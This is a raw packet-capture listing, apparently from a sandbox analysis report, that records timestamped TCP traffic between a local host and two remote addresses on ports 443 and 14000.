                                                                Nov 22, 2024 17:12:14.954606056 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.954659939 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.960777998 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.960809946 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.960854053 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.960889101 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.960926056 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.960948944 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.966054916 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.966082096 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.967061996 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.967107058 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.967195034 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.972328901 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.972352982 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.972450972 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.972462893 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.972501993 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.978565931 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.978591919 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.978657007 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.978677988 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.978719950 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.984406948 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.984431028 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.984603882 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.984620094 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.984662056 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.990710974 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.990765095 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.990827084 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.990845919 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.990889072 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.996211052 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.996227026 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.996310949 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:14.996320963 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:14.996366024 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.155678988 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.155705929 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.155797958 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.155834913 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.155951023 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.161984921 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.162024021 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.162079096 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.162096024 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.162110090 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.163897991 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.168009996 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.168031931 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.168082952 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.168095112 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.168139935 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.168155909 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.173583984 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.173605919 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.173670053 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.173683882 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.173723936 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.179786921 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.179805040 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.179868937 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.179881096 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.179919004 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.185619116 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.185637951 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.185703039 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.185714006 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.185749054 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.191833019 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.191869020 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.191931009 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.191941023 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.191956043 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.195882082 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.197252989 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.197272062 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.197321892 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.197330952 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.197454929 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.357570887 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.357594967 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.357676029 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.357686996 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.357729912 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613209963 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613234997 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613311052 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613329887 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613362074 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613380909 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613393068 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613430023 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613437891 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613460064 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613478899 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613477945 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613531113 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613537073 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613552094 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613567114 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613614082 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613619089 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613626957 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613642931 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613676071 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613686085 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613715887 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613725901 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613729954 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613756895 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613795042 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.613893032 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.613930941 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614001036 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614006042 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614017963 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614043951 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614077091 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614083052 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614097118 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614113092 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614115000 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614139080 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614144087 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614167929 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614240885 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614258051 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614288092 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614294052 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614320040 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614327908 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614341974 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614379883 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614387035 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614403963 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614413023 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614425898 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614455938 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614463091 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614484072 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614487886 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614500046 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614521980 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614528894 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614538908 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614557981 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614558935 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614612103 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.614618063 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.614752054 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.760130882 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.760157108 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.760230064 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.760271072 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.760292053 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.760317087 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.766185045 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.766208887 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.766252995 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.766263962 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.766289949 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.766318083 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.772325993 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.772346020 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.772407055 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.772443056 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.772474051 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.772516012 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.782042027 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.782061100 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.782113075 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.782138109 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.782171011 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.782191038 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.785881042 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.785902023 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.785964966 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.785988092 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.786048889 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.790951014 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.790972948 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.791023016 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.791043043 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.791074991 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.791090965 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.796061039 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.796082973 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.796153069 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.796166897 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.796216965 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.799626112 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.799658060 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.799710035 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.799721956 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.799738884 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:15.799746037 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.799777031 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:15.800379992 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:22.401619911 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:22.521338940 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:22.521410942 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:23.524406910 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:23.645222902 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:23.645414114 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:24.997194052 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:25.002530098 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:25.122503996 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:25.427056074 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:25.477536917 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:25.509439945 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:25.694502115 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:25.694565058 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:25.694668055 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:25.725898981 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:25.725935936 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:25.814604998 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:25.814640045 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:25.814713001 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:25.814740896 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:26.182018042 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:26.227550983 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:28.196254015 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:28.316019058 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:30.321285009 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:30.440865040 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:32.446408033 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:32.565983057 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:34.571285009 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:34.690756083 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:34.715704918 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:34.747040033 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:34.866828918 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:36.868208885 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:36.990806103 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:38.993180990 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:39.112766981 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:41.118206024 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:41.237827063 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:43.243199110 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:43.362917900 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:45.368479967 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:45.488820076 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:47.493191957 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:47.612709045 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:49.618211985 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:49.722125053 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:49.737750053 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:49.761264086 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:49.881036043 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:51.883882046 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:52.004206896 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:54.008959055 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:54.128834963 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:56.133961916 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:56.253623009 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:12:58.258838892 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:12:58.378353119 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:00.383920908 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:00.503822088 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:02.508869886 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:02.628842115 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:04.635546923 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:04.728024006 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:04.755400896 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:04.774502993 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:04.774705887 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:04.894951105 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:06.899631023 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:07.019289970 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:09.024594069 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:09.144377947 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:11.149502993 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:11.269052029 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:13.274502993 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:13.394293070 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:15.399503946 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:15.519165993 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:17.524511099 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:17.646866083 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:19.649514914 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:19.731971979 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:19.769200087 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:19.774655104 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:19.774746895 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:19.894263983 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:21.899621010 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:22.019237041 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:24.024676085 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:24.144382954 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:26.149558067 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:26.269162893 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:28.274645090 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:28.394167900 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:30.399571896 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:30.519128084 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:32.524580956 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:32.644510031 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:34.649590015 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:34.738838911 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:34.774763107 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:34.775791883 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:34.894336939 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:36.899590015 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:37.019303083 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:39.025019884 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:39.144762993 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:41.149749041 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:41.269630909 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:43.274581909 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:43.396148920 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:45.399621010 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:45.519267082 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:47.524611950 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:47.644283056 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:49.649610996 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:49.771910906 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:49.831060886 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:49.868447065 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:49.988101959 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:51.993339062 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:52.113374949 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:54.118370056 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:54.238271952 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:56.259021044 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:56.385020018 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:13:58.399693966 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:13:58.520273924 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:00.524619102 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:00.648112059 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:02.649704933 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:02.769340038 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:04.748083115 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:04.790276051 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:04.790523052 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:04.910082102 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:06.915251017 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:07.035425901 CET1400049786172.86.76.228192.168.2.5
